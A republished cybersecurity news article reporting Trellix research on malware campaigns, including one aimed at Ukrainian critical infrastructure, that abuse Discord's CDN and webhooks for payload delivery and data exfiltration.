Facebook Twitter Instagram
    • Privacy Policy
    • Contact Us
    Facebook Twitter Instagram Pinterest Vimeo
    AI Home SecurityAI Home Security
    • Home
    • Home Security
    • Cyber Security
    • Biometric Technology
    Contact
    AI Home SecurityAI Home Security
    Cyber Security

    A Playground for Nation-State Hackers Targeting Critical Infrastructure

    justmattgBy justmattgOctober 17, 2023No Comments3 Mins Read

    [ad_1]

    Oct 17, 2023NewsroomMalware / APT

    Discord Hacking

    In what’s the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray in leveraging the social platform for targeting critical infrastructure.

    Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.

    “The usage of Discord is largely limited to information stealers and grabbers that anyone can buy or download from the Internet,” Trellix researchers Ernesto Fernández Provecho and David Pastor Sanz said in a Monday report.

    Cybersecurity

    But that may be changing, for the cybersecurity firm said it found evidence of an artifact targeting Ukrainian critical infrastructures. There is currently no evidence linking it to a known threat group.

    “”The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape,” the researchers noted.

    The sample is a Microsoft OneNote file distributed via an email message impersonating the non-profit dobro.ua.

    The file, once opened, contains references to Ukrainian soldiers to trick recipients into donating by clicking on a booby-trapped button, resulting in the execution of Visual Basic Script (VBS) designed to extract and run a PowerShell script in order to download another PowerShell script from a GitHub repository.

    Discord Hacking

    For its part, in the final stage, PowerShell takes advantage of a Discord webhook to exfiltrate system metadata.

    “The fact that the only goal of the final payload is obtaining information about the system indicates that the campaign is still in an early stage, which also fits with the usage of Discord as [command-and-control],” the researchers said.

    “However, it is important to highlight that the actor could deliver a more sophisticated piece of malware to the compromised systems in the future by modifying the file stored in the GitHub repository.”

    Cybersecurity

    Trellix’s analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that utilize Discord’s CDN to download a next-stage payload, including stealers like RedLine, Vidar, Agent Tesla, and Umbral.

    On top of that, some of the common malware families that have been observed using Discord webhooks are Mercurial Grabber, Stealerium, Typhon Stealer, and Venom RAT.

    “The abuse of Discord’s CDN as a distribution mechanism for additional malware payloads showcases the adaptability of cybercriminals to exploit collaborative applications for their gain,” the researchers said.

    “APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk.”

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.



    [ad_2]

    Source link

    Previous ArticleFace Image Quality Workshop | Biometric Update
    Next Article Amazon Quietly Wades Into the Passkey Waters
    justmattg
    • Website

    Related Posts

    Cyber Security

    Name That Toon: Last Line of Defense

    April 16, 2024
    Cyber Security

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024
    Cyber Security

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024
    Add A Comment

    Leave A Reply Cancel Reply

    Facebook Twitter Instagram Pinterest
    • Privacy Policy
    • Contact Us
    AI Home Security © 2025 All rights reserved | Designed By ESmartsSolution

    Type above and press Enter to search. Press Esc to cancel.

    ↑